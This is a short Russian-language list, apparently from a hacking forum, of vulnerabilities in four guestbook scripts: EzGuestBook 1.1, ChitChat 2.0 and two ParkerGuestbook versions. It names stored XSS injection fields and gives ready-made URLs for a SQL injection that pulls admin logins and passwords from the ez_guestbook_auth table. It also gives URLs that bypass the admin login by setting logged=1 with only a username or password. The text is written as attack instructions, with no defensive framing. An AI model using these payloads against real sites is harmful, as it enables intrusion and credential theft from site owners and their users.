Гостевые книги:
1. EzGuestBook 1.1
1) Активные XSS:
При создание сообщения в поля
Name,
E-Mail,
Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке.
2) SQL инъекция:
Код:
http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*
Вывод логина и пароля пользователя:
Код:
http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password),2,3,4,5+from+ez_guestbook_auth/*
2. ChitChat 2.0
Активная XSS:
При создание сообщения в поле
Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
3. ParkerGuestbook v4.00 Add moderators
Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль.
Угадать логин проще - к примеру стандартный логин admin, его могут не поменять.
Доступ к админке, имя только логин:
http://site.ru/admin.php?
adminlogin=grey&logged=1
Доступ к админке, имя только пароль:
http://site.ru/admin.php?
adminpass=123&logged=1
4. ParkerGuestbook v2.00
Активные XSS:
При создание сообщения в поля
Имя,
Сайт,
ICQ,
Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений.